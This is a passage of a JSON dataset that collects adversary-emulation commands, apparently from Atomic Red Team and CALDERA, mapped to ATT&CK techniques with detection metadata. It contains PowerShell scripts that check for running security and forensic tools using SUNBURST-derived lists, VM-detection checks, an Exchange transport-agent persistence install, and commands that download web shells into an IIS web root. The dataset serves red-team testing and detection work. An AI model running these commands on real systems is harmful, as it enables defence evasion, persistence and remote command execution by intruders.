\"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n \"rabin2\",\n \"radare2\",\n \"ramcapture64\",\n \"ramcapture\",\n \"reflector\",\n \"regmon\",\n \"resourcehacker\",\n \"retdec-ar-extractor\",\n \"retdec-bin2llvmir\",\n \"retdec-bin2pat\",\n \"retdec-config\",\n \"retdec-fileinfo\",\n \"retdec-getsig\",\n \"retdec-idr2pat\",\n \"retdec-llvmir2hll\",\n \"retdec-macho-extractor\",\n \"retdec-pat2yara\",\n \"retdec-stacofin\",\n \"retdec-unpacker\",\n \"retdec-yarac\",\n \"rundotnetdll\",\n \"sbiesvc\",\n \"scdbg\",\n \"scylla_x64\",\n \"scylla_x86\",\n \"shellcode_launcher\",\n \"solarwindsdiagnostics\",\n \"sysmon64\",\n \"sysmon\",\n \"task explorer\",\n \"task explorer-x64\",\n \"tcpdump\",\n \"tcpvcon\",\n \"tcpview\",\n \"vboxservice\",\n \"win32_remote\",\n \"win64_remotex64\",\n \"windbg\",\n \"windump\",\n \"winhex64\",\n \"winhex\",\n \"winobj\",\n \"wireshark\",\n \"x32dbg\",\n \"x64dbg\",\n \"xwforensics64\",\n \"xwforensics\",\n \"redcloak\",\n \"avgsvc\",\n \"avgui\",\n \"avgsvca\",\n \"avgidsagent\",\n \"avgsvcx\",\n \"avgwdsvcx\",\n \"avgadminclientservice\",\n \"afwserv\",\n \"avastui\",\n \"avastsvc\",\n \"aswidsagent\",\n \"aswidsagenta\",\n \"aswengsrv\",\n \"avastavwrapper\",\n \"bccavsvc\",\n \"psanhost\",\n \"psuaservice\",\n \"psuamain\",\n \"avp\",\n \"avpui\",\n \"ksde\",\n \"ksdeui\",\n \"tanium\",\n \"taniumclient\",\n \"taniumdetectengine\",\n \"taniumendpointindex\",\n \"taniumtracecli\",\n \"taniumtracewebsocketclient64\"\n);\n\nfunction Find-ForensicProcesses {\n param (\n $ForensicProcessList\n );\n $CurrentProcesses = Get-Process | Sort-Object | Select-Object -Property Name | Get-Unique -AsString;\n foreach ($proc in $CurrentProcesses) {\n foreach ($forensicProc in $ForensicProcessList) {\n if ($proc.name -like $forensicProc) {\n $procPath = Get-Process -Name $proc.Name | Sort-Object | Select-Object -Property Path | Get-Unique;\n Write-Host \"[!] Forensic process found: \" $proc.Name;\n Write-Host \"[!] Path: \" $procPath.Path;\n }\n }\n }\n}\n\nFind-ForensicProcesses($forensicProcesses);", + "source": "data/abilities/defense-evasion/7a6ba833-de40-466a-8969-5c37b13603e0.yml", + "name": "Check for analysis/sandbox environment processes. Process black list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/)." + }, + { + "command": "get-wmiobject win32_computersystem | fl model\n", + "source": "data/abilities/discovery/5dc841fd-28ad-40e2-b10e-fb007fe09e81.yml", + "name": "Determine if the system is virtualized or physical" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1497.001", + "display_name": "Virtualization/Sandbox Evasion: System Checks", + "atomic_tests": [ + { + "name": "Detect Virtualization Environment (Linux)", + "auto_generated_guid": "dfbd1a21-540d-4574-9731-e852bd6fe840", + "description": "systemd-detect-virt detects execution in a virtualized environment.\nAt boot, dmesg stores a log if a hypervisor is detected.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n" + } + }, + { + "name": "Detect Virtualization Environment (Windows)", + "auto_generated_guid": "502a7dc4-9d6f-4d28-abf2-f0e84692562d", + "description": "Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n", + "cleanup_command": "$error.clear()\n" + } + }, + { + "name": "Detect Virtualization Environment (MacOS)", + "auto_generated_guid": "a960185f-aef6-4547-8350-d1ce16680d09", + "description": "ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n" + } + }, + { + "name": "Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)", + "auto_generated_guid": "4a41089a-48e0-47aa-82cb-5b81a463bc78", + "description": "Windows Management Instrumentation(WMI) objects contain system information which helps to detect virtualization. This test will get the model and manufacturer of the machine to determine if it is a virtual machine, such as through VMware or VirtualBox. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n" + } + } + ] + }, + { + "id": "1258b063-27d6-489b-a677-4807faacf868", + "name": "Check Security Services", + "description": "Check for security services. Security service list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n \"fsfw\",\n \"fsdfw\",\n \"fsms\",\n \"fsdevcon\"\n);\n\n$currentServices = Get-Service | Select-Object -Property Name;\nforeach ($svc in $currentServices) {\n foreach ($secSvc in $securityServices) {\n if ($svc.Name -like $secSvc) {\n $svcDetails = Get-Service -name $svc.Name | Select-Object -Property Name, DisplayName, Status;\n Write-Host \"[!] Security service found:\";\n Write-Host \" Service Name:`t\", $svcDetails.Name;\n Write-Host \" Display Name:`t\", $svcDetails.DisplayName;\n Write-Host \" Status:`t`t\", $svcDetails.Status;\n Write-Host \"\";\n }\n }\n}\n" + } + } + } + }, + { + "id": "7a6ba833-de40-466a-8969-5c37b13603e0", + "name": "Check analysis environment processes", + "description": "Check for analysis/sandbox environment processes. Process black list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks" + }, + "platforms": { + "windows": { + "psh": { + "command": "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n \"rabin2\",\n \"radare2\",\n \"ramcapture64\",\n \"ramcapture\",\n \"reflector\",\n \"regmon\",\n \"resourcehacker\",\n \"retdec-ar-extractor\",\n \"retdec-bin2llvmir\",\n \"retdec-bin2pat\",\n \"retdec-config\",\n \"retdec-fileinfo\",\n \"retdec-getsig\",\n \"retdec-idr2pat\",\n \"retdec-llvmir2hll\",\n \"retdec-macho-extractor\",\n \"retdec-pat2yara\",\n \"retdec-stacofin\",\n \"retdec-unpacker\",\n \"retdec-yarac\",\n \"rundotnetdll\",\n \"sbiesvc\",\n \"scdbg\",\n \"scylla_x64\",\n \"scylla_x86\",\n \"shellcode_launcher\",\n \"solarwindsdiagnostics\",\n \"sysmon64\",\n \"sysmon\",\n \"task explorer\",\n \"task explorer-x64\",\n \"tcpdump\",\n \"tcpvcon\",\n \"tcpview\",\n \"vboxservice\",\n \"win32_remote\",\n \"win64_remotex64\",\n \"windbg\",\n \"windump\",\n \"winhex64\",\n \"winhex\",\n \"winobj\",\n \"wireshark\",\n \"x32dbg\",\n \"x64dbg\",\n \"xwforensics64\",\n \"xwforensics\",\n \"redcloak\",\n \"avgsvc\",\n \"avgui\",\n \"avgsvca\",\n \"avgidsagent\",\n \"avgsvcx\",\n \"avgwdsvcx\",\n \"avgadminclientservice\",\n \"afwserv\",\n \"avastui\",\n \"avastsvc\",\n \"aswidsagent\",\n \"aswidsagenta\",\n \"aswengsrv\",\n \"avastavwrapper\",\n \"bccavsvc\",\n \"psanhost\",\n \"psuaservice\",\n \"psuamain\",\n \"avp\",\n \"avpui\",\n \"ksde\",\n \"ksdeui\",\n \"tanium\",\n \"taniumclient\",\n \"taniumdetectengine\",\n \"taniumendpointindex\",\n \"taniumtracecli\",\n \"taniumtracewebsocketclient64\"\n);\n\nfunction Find-ForensicProcesses {\n param (\n $ForensicProcessList\n );\n $CurrentProcesses = Get-Process | Sort-Object | Select-Object -Property Name | Get-Unique -AsString;\n foreach ($proc in $CurrentProcesses) {\n foreach ($forensicProc in $ForensicProcessList) {\n if ($proc.name -like $forensicProc) {\n $procPath = Get-Process -Name $proc.Name | Sort-Object | Select-Object -Property Path | Get-Unique;\n Write-Host \"[!] Forensic process found: \" $proc.Name;\n Write-Host \"[!] Path: \" $procPath.Path;\n }\n }\n }\n}\n\nFind-ForensicProcesses($forensicProcesses);" + } + } + } + }, + { + "id": "5dc841fd-28ad-40e2-b10e-fb007fe09e81", + "name": "Virtual or Real", + "description": "Determine if the system is virtualized or physical", + "tactic": "discovery", + "technique": { + "attack_id": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks" + }, + "platforms": { + "windows": { + "psh": { + "command": "get-wmiobject win32_computersystem | fl model\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1505.002", + "command_list": [ + "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory -AssemblyPath #{dll_path}\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath c:\\program files\\microsoft\\Exchange Server\\v15\\bin\\Microsoft.Exchange.Security.Interop.dll\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "Install-TransportAgent -Name Security Interop Agent -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}\nEnable-TransportAgent Security Interop Agent\nGet-TransportAgent | Format-List Name,Enabled\n" + ], + "commands": [ + { + "command": "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory -AssemblyPath #{dll_path}\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "source": "atomics/T1505.002/T1505.002.yaml", + "name": "Atomic Red Team Test - Server Software Component: Transport Agent" + }, + { + "command": "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath c:\\program files\\microsoft\\Exchange Server\\v15\\bin\\Microsoft.Exchange.Security.Interop.dll\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "source": "atomics/T1505.002/T1505.002.yaml", + "name": "Atomic Red Team Test - Server Software Component: Transport Agent" + }, + { + "command": "Install-TransportAgent -Name Security Interop Agent -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}\nEnable-TransportAgent Security Interop Agent\nGet-TransportAgent | Format-List Name,Enabled\n", + "source": "atomics/T1505.002/T1505.002.yaml", + "name": "Atomic Red Team Test - Server Software Component: Transport Agent" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1505.002", + "display_name": "Server Software Component: Transport Agent", + "atomic_tests": [ + { + "name": "Install MS Exchange Transport Agent Persistence", + "auto_generated_guid": "43e92449-ff60-46e9-83a3-1a38089df94d", + "description": "Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla.\nMore details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "class_factory": { + "description": "Class factory of transport agent.", + "type": "String", + "default": "Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory" + }, + "dll_path": { + "description": "Path of DLL to use as transport agent.", + "type": "Path", + "default": "c:\\program files\\microsoft\\Exchange Server\\v15\\bin\\Microsoft.Exchange.Security.Interop.dll" + }, + "transport_agent_identity": { + "description": "Friendly name of transport agent once installed.", + "type": "String", + "default": "Security Interop Agent" + } + }, + "dependencies": [ + { + "description": "Microsoft Exchange SnapIn must be installed\n", + "prereq_command": "Get-TransportAgent -TransportService FrontEnd\n", + "get_prereq_command": "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn\n" + } + ], + "executor": { + "command": "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "cleanup_command": "if(Get-Command \"Get-TransportAgent\" -ErrorAction Ignore){\n Disable-TransportAgent #{transport_agent_identity}\n Uninstall-TransportAgent #{transport_agent_identity}\n Get-TransportAgent\n}\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1505.003", + "command_list": [ + "xcopy /I /Y #{web_shells} C:\\inetpub\\wwwroot\n", + "xcopy /I /Y PathToAtomicsFolder\\T1505.003\\src\\ #{web_shell_path}\n" + ], + "commands": [ + { + "command": "xcopy /I /Y #{web_shells} C:\\inetpub\\wwwroot\n", + "source": "atomics/T1505.003/T1505.003.yaml", + "name": "Atomic Red Team Test - Server Software Component: Web Shell" + }, + { + "command": "xcopy /I /Y PathToAtomicsFolder\\T1505.003\\src\\ #{web_shell_path}\n", + "source": "atomics/T1505.003/T1505.003.yaml", + "name": "Atomic Red Team Test - Server Software Component: Web Shell" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1505.003", + "display_name": "Server Software Component: Web Shell", + "atomic_tests": [ + { + "name": "Web Shell Written to Disk", + "auto_generated_guid": "0a2ce662-1efa-496f-a472-2fe7b080db16", + "description": "This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.\nIdea from APTSimulator.\ncmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "web_shell_path": { + "description": "The path to drop the web shell", + "type": "String", + "default": "C:\\inetpub\\wwwroot" + }, + "web_shells": { + "description": "Path of Web Shell", + "type": "Path", + "default": "PathToAtomicsFolder\\T1505.003\\src\\" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Web shell must exist on disk at specified location (#{web_shells})\n", + "prereq_command": "if (Test-Path #{web_shells}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp\" -OutFile \"#{web_shells}/b.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp\" -OutFile \"#{web_shells}/tests.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx\" -OutFile \"#{web_shells}/cmd.aspx\"\n" + } + ], + "executor": { + "command": "xcopy /I /Y #{web_shells} #{web_shell_path}\n", + "cleanup_command": "del #{web_shell_path}\\b.jsp /q >nul 2>&1\ndel #{web_shell_path}\\tests.jsp /q >nul 2>&1\ndel #{web_shell_path}\\cmd.aspx /q >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated 